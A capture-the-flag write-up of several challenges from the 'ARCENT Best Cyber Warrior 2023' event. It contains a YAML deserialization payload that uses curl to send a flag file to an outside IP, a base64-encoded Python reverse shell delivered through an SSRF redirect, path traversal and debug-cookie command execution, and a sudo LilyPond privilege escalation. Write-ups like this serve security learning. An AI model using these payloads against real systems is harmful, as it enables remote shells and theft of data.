🪖ARCENT Best Cyber Warrior 2023

Quick challenge writeups for the CTF to explain exploitation.

CyberCompose

Vulnerable to https://www.rapid7.com/db/modules/exploit/multi/fileformat/nodejs_js_yaml_load_code_exec/ Rapid7

Payload:

!!python/object/apply:os.popen ['curl -X POST http://159.223.147.201/ --data "$(cat /app/RanDomflagN4m3.txt)"']

Confuser

Vulnerable to https://github.com/advisories/GHSA-ffqj-6fqr-9h24

Intruder

• Got SSRF using https://blog.doyensec.com/2023/03/16/ssrf-remediation-bypass.html

• It was a hassle setting up my own https server for it and couldn't use self signed certs because it did not have insecure option enabled on the vulnerable webserver.

• Was able to get YAML deserialization with this php redirect to get the SSRF and exploit working:

<?php  header('Location: http://127.0.0.1:5000/yaml/ISFweXRob24vb2JqZWN0L25ldzpXYXJuaW5nCnN0YXRlOgogIGV4dGVuZDogISFweXRob24vbmFtZTpleGVjCmxpc3RpdGVtczogJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxNTkuMjIzLjE0Ny4yMDEiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc%3D'); ?>

S7R34M5

from scapy.all import *
import sys

#take in file name from argument
file = sys.argv[1]

#open file
f = open(file, "r")

# Define the source and destination IP addresses
source_ip = "192.168.245.129"
destination_ip = "192.168.1.7"

# Define an array to store the data bytes
data_array = []

packets = rdpcap(file)

def process_packet(packet):
    # find all UDP packets from 192.168.245.129 to 192.168.1.7 and get the data byte and add to array and print array
    if packet.haslayer(IP) and packet.haslayer(UDP) and packet[IP].src == source_ip and packet[IP].dst == destination_ip:
        data = packet[Raw].load
        data_array.append(data)

# Process each packet in the pcap file
for packet in packets:
    process_packet(packet)

# merge the array and print
data = b''.join(data_array)
print(str(data, 'utf-8'))

LeakyPond

Initial Access

Path traversal: /vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../var/www/html/debugger_infra-temp.php

Debug was still enabled and would execute system on the debug cookie value.

RCE:

GET /index.php?debug_infra=1 HTTP/1.1
Host: wcom5p6v45jax3g1w93xkxdt7vr86dv91gp0c43l-web.cybertalentslabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: debug=ls
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
X-PwnFox-Color: blue

Used Ivan Sincek PHP reverse shell for more stable environment.

Priv Esc

$ echo "JSBjb21iaW5lcyBzaGVsbCBleGVjdXRpb24gd2l0aCBmaWxlIHJlYWRpbmcKJSB0byBnZXQgc29tZXRoaW5nIGxpa2UgYW4gaW50ZXJhY3RpdmUgc2hlbGwKIyhkZWZpbmUgcyAiIikKIyhzeXN0ZW0gImNhdCAvcm9vdC9mbGFnKiA+IC90bXAvZmxhZ3oiKQojKGxldCogICgoZiAob3Blbi1pbnB1dC1maWxlICIvdG1wL3F3ZXJ0eWFzZGYiKSkKICAgICAgICAoYyAjXHNwYWNlKSkKICAod2hpbGUgKG5vdCAoZW9mLW9iamVjdD8gYykpCiAgKHNldCEgcyAoc3RyaW5nLWFwcGVuZCBzIChzdHJpbmcgYykpKQogIChzZXQhIGMgKHJlYWQtY2hhciBmKSkpKQpcbmV3IFN0YWZmIDw8e2deI3MKfT4+" | base64 -d > test.ly
$ sudo /opt/lilypond/bin/lilypond test.ly
Processing `test.ly'
Parsing...
test.ly:1: warning: no \version statement found, please add

\version "2.23.82"

for future compatibility
Interpreting music...
Preprocessing graphical objects...
Finding the ideal number of pages...
Fitting music on 1 page...
Drawing systems...
Converting to `test.pdf'...
Success: compilation successfully completed
$ ls
flagz
qwertyasdf
test.ly
test.pdf
$ cat flagz
flag{ZAE324RTHJNBVCXWQZ34568UHBVCX}
$

SayingPlease

Simply change the base64 encoded authentication token from user to admin and the index.php page will display the flag.